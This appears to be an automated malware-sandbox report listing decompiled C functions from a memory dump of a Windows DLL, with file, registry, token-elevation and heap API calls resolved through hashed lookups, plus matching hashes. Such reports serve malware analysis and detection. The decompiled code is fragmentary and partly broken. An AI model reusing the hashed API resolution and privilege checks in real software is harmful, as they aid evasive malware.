0x6f335b7b
0x6f335b7d
0x6f335b7d
0x6f335b79
0x6f335b8f
0x6f335b9b
0x6f335ccc
0x6f335c09
0x6f335c12
0x6f335c13
0x6f335c18
0x6f335c19
0x6f335c0b
0x6f335c0d
0x6f335c0d
0x6f335c2f
0x6f335c43
0x6f335c31
0x6f335c3e
0x6f335c40
0x6f335c40
0x6f335c45
0x6f335c4a
0x6f335c58
0x6f335cc3
0x00000000
0x6f335c5a
0x6f335c5f
0x6f335cac
0x6f335cae
0x6f335cb0
0x6f335cba
0x6f335cba
0x6f335cb0
0x6f335c61
0x6f335c6d
0x6f335c86
0x6f335c88
0x6f335c89
0x6f335c8a
0x6f335c8c
0x6f335c8e
0x6f335c8f
0x6f335c8f
0x00000000
0x6f335c92
0x6f335ba1
0x6f335bb1
0x6f335bb1

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5bd28dd5017f827463c350cd8ac4b38b4cb76dd6d713eea322d4a718476b2d2
Instruction ID: 18006679ff27ef33601142e328036ad89a7ce5a3c7a2d3caafec4325e98b5a7d
Opcode Fuzzy Hash: c5bd28dd5017f827463c350cd8ac4b38b4cb76dd6d713eea322d4a718476b2d2
Instruction Fuzzy Hash: 15312933A843AABFEB90AA784D85F2B76D9DF8164CF104539F98296181DF11E944C361

Uniqueness

Uniqueness Score: -1.00%

Function 6F331166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F331166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6f331168
0x6f33116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F33117B

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 4b4f1c3c1fdc917369cdb9ee76e5837c9aaaecd0c901a5d60178e5eb2dc1e95e
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: A711CA72E446E25AFB16E5689850BFF76989F42740F104877E8A0DA0E4CF26D881D662

Uniqueness

Uniqueness Score: -1.00%

Function 6F335BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6F335BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F333064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F32C26C(_t24);
				if(E6F32C280(_t24) != 0) {
					_t34[2] = E6F3335F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6F333064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6F333698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6F333064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f335bbd
0x6f335bc1
0x6f335bc4
0x6f335bc7
0x6f335c09
0x6f335c12
0x6f335c18
0x6f335c19
0x6f335c0b
0x6f335c0d
0x6f335c0d
0x6f335c2f
0x6f335c43
0x6f335c31
0x6f335c3e
0x6f335c40
0x6f335c40
0x6f335c45
0x6f335c4a
0x6f335c58
0x6f335cc3
0x6f335cc6
0x6f335c5a
0x6f335c5f
0x6f335cac
0x6f335cb0
0x6f335cba
0x6f335cba
0x6f335cb0
0x6f335c61
0x6f335c6d
0x6f335c72
0x6f335c86
0x6f335c88
0x6f335c89
0x6f335c8a
0x6f335c8c
0x6f335c8e
0x6f335c8f
0x6f335c8f
0x6f335c92
0x6f335c92
0x6f335c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F335C3E

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: efc385914dbebfeb6b3fa740c3aadaa2239e5158d5efb5feadb187acd0e641b4
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: 8001F933B843AABAFA50A6785D41F7B778CDF8169CF008436BA4155185DF12A895C231

Uniqueness

Uniqueness Score: -1.00%

Function 6F335BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F335BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6F333064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6F32C26C(_t24);
					if(E6F32C280(_t24) != 0) {
						_t33[2] = E6F3335F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6F333064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6F333698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6F333064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6f335be5
0x6f335be7
0x6f335bfe
0x6f335c09
0x6f335c12
0x6f335c18
0x6f335c19
0x6f335c0b
0x6f335c0d
0x6f335c0d
0x6f335c2f
0x6f335c43
0x6f335c31
0x6f335c3e
0x6f335c40
0x6f335c40
0x6f335c45
0x6f335c4a
0x6f335c58
0x6f335cc3
0x6f335cc6
0x6f335c5a
0x6f335c5f
0x6f335cac
0x6f335cb0
0x6f335cba
0x6f335cba
0x6f335cb0
0x6f335c61
0x6f335c6d
0x6f335c72
0x6f335c86
0x6f335c88
0x6f335c89
0x6f335c8a
0x6f335c8c
0x6f335c8e
0x6f335c8f
0x6f335c8f
0x6f335c92
0x6f335c92
0x6f335be9
0x6f335be9
0x6f335bf0
0x6f335bf0
0x6f335c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F335C3E

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 5b98909f01c6be40aa5200ecc138b00523d37308b5e9425f58cddc9b2edccbe1
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: BF012633A843A7BAFA9096788D41F6B778CDF4125CF108935B94295181DF23B598C371

Uniqueness

Uniqueness Score: -1.00%

Function 6F335BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F335BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F333064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F32C26C(_t24);
				if(E6F32C280(_t24) != 0) {
					_t34[2] = E6F3335F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6F333064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6F333698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6F333064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f335bd1
0x6f335bd8
0x6f335bdb
0x6f335c09
0x6f335c12
0x6f335c18
0x6f335c19
0x6f335c0b
0x6f335c0d
0x6f335c0d
0x6f335c2f
0x6f335c43
0x6f335c31
0x6f335c3e
0x6f335c40
0x6f335c40
0x6f335c45
0x6f335c4a
0x6f335c58
0x6f335cc3
0x6f335cc6
0x6f335c5a
0x6f335c5f
0x6f335cac
0x6f335cb0
0x6f335cba
0x6f335cba
0x6f335cb0
0x6f335c61
0x6f335c6d
0x6f335c72
0x6f335c86
0x6f335c88
0x6f335c89
0x6f335c8a
0x6f335c8c
0x6f335c8e
0x6f335c8f
0x6f335c8f
0x6f335c92
0x6f335c92
0x6f335c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F335C3E

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 7ca86668c88dae872dc23b7a9f75910401b12f962e416be5e88ca0ce62b73ff6
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 54012837A803AB7AFB90A6784D41F7B728DDF8125CF008536FA4295185DF27A898C331

Uniqueness

Uniqueness Score: -1.00%

Function 6F335BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F335BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F333064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F32C26C(_t23);
				if(E6F32C280(_t23) != 0) {
					_t31[2] = E6F3335F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F333064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F333698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F333064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f335bb3
0x6f335bba
0x6f335c09
0x6f335c12
0x6f335c18
0x6f335c19
0x6f335c0b
0x6f335c0d
0x6f335c0d
0x6f335c2f
0x6f335c43
0x6f335c31
0x6f335c3e
0x6f335c40
0x6f335c40
0x6f335c45
0x6f335c4a
0x6f335c58
0x6f335cc3
0x6f335cc6
0x6f335c5a
0x6f335c5f
0x6f335cac
0x6f335cb0
0x6f335cba
0x6f335cba
0x6f335cb0
0x6f335c61
0x6f335c6d
0x6f335c72
0x6f335c86
0x6f335c88
0x6f335c89
0x6f335c8a
0x6f335c8c
0x6f335c8e
0x6f335c8f
0x6f335c8f
0x6f335c92
0x6f335c92
0x6f335c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F335C3E

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: a63068c71fecde37fde0d6da5c77b472f79f8e51a48143eba845713a8057661c
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 56014733A803ABBAFA91A6388D41F7B738CDF8125CF004436BA4265185DF13B994C330

Uniqueness

Uniqueness Score: -1.00%

Function 6F335C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F335C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F333064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F32C26C(_t23);
				if(E6F32C280(_t23) != 0) {
					_t31[2] = E6F3335F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F333064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F333698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F333064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f335c01
0x6f335c05
0x6f335c09
0x6f335c12
0x6f335c18
0x6f335c19
0x6f335c0b
0x6f335c0d
0x6f335c0d
0x6f335c2f
0x6f335c43
0x6f335c31
0x6f335c3e
0x6f335c40
0x6f335c40
0x6f335c45
0x6f335c4a
0x6f335c58
0x6f335cc3
0x6f335cc6
0x6f335c5a
0x6f335c5f
0x6f335cac
0x6f335cb0
0x6f335cba
0x6f335cba
0x6f335cb0
0x6f335c61
0x6f335c6d
0x6f335c72
0x6f335c86
0x6f335c88
0x6f335c89
0x6f335c8a
0x6f335c8c
0x6f335c8e
0x6f335c8f
0x6f335c8f
0x6f335c92
0x6f335c92
0x6f335c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F335C3E

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 262e6b381c2200478a8194c219802d6c704ee21ae0ef43f5ba760298cb91b288
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: D8012B37A803AB7AFA91A6784D41F7B774CDF8169CF004535BA4255185DF13B994C370

Uniqueness

Uniqueness Score: -1.00%

Function 6F335E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6F335E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6F32C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6F333064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6f335e14
0x6f335e15
0x6f335e17
0x6f335e1d
0x6f335e1f
0x6f335e23
0x6f335e23
0x6f335e27
0x6f335e33
0x6f335e67
0x6f335e67
0x00000000
0x6f335e35
0x6f335e3a
0x6f335e3b
0x6f335e4f
0x6f335e60
0x6f335e51
0x6f335e5c
0x6f335e5c
0x6f335e65
0x6f335e6d
0x6f335e6f
0x6f335e72
0x6f335e77
0x6f335e77
0x6f335e7b
0x6f335e80
0x00000000
0x00000000
0x00000000
0x6f335e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6F335D48,?,?), ref: 6F335E5C

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 05f191d4a797d95da9d96e97b9f5056edfb21c7e2ee60b3faa09959a49054adb
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 6AF0F933E09B7279D791D93C9D40AD773E8EF91760F144B2AF580A6280EB61A4808361

Uniqueness

Uniqueness Score: -1.00%

Function 6F33564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F33564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6F333064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6F32E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6f335656
0x6f335658
0x6f33565f
0x6f335661
0x6f335665
0x6f335667
0x6f33566a
0x6f33566d
0x6f33566d
0x6f335687
0x00000000
0x00000000
0x6f335698
0x6f33569c
0x00000000
0x00000000
0x6f3356aa
0x6f3356ad
0x6f3356b2
0x6f3356b7
0x6f3356b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6F335698

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: d5daf8a459d2b1d72051e82f42a3314fb6c4c0b950200227d01a5d91f7a8d6e2
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 6FF0C8B660031AABE724DE1DCC44DB7BBFCEBC1B50F01851DA0D542540EA31AC50CA70

Uniqueness

Uniqueness Score: -1.00%

Function 6F331030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F331030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6F33306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6F33306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6f33103e
0x6f331040
0x6f33104e
0x6f331052
0x6f33109b
0x00000000
0x6f33109b
0x6f331057
0x6f331058
0x6f33105a
0x6f33105f
0x00000000
0x6f331078
0x6f33107c
0x6f331089
0x6f33108d
0x00000000
0x00000000
0x00000000
0x6f331096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6F331089

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: ecad7d530bb82ed83a562719f974800f523f9c58d0c880b43602a4e255c7a565
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 52F0CD72B846C3ABFA00E5789C25F7F32ED9BC1610F408839B580CA1A4EF39D8058222

Uniqueness

Uniqueness Score: -1.00%

Function 6F333628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6F333628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6f33d228 == 0xa33c83e5) {
					_t7 = E6F333064(0x60a28c5c, 0x1c6ef387);
					 *0x6f33d22c = E6F333064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6f33d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6f33d228 = 0;
					}
				}
				_t3 = E6F333064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6f33d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6f333630
0x6f333638
0x6f33366b
0x6f33367c
0x6f333687
0x6f333692
0x6f333694
0x6f333694
0x6f333687
0x6f333644
0x6f33364b
0x00000000
0x6f33364d
0x6f33364d
0x6f33364e
0x6f333650
0x6f333652
0x6f333653
0x00000000
0x6f333653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6F32DE09,?,?), ref: 6F333692

Memory Dump Source

Source File: 00000000.00000002.874060553.000000006F321000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000000.00000002.874049018.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874103969.000000006F33A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.874116574.000000006F33D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
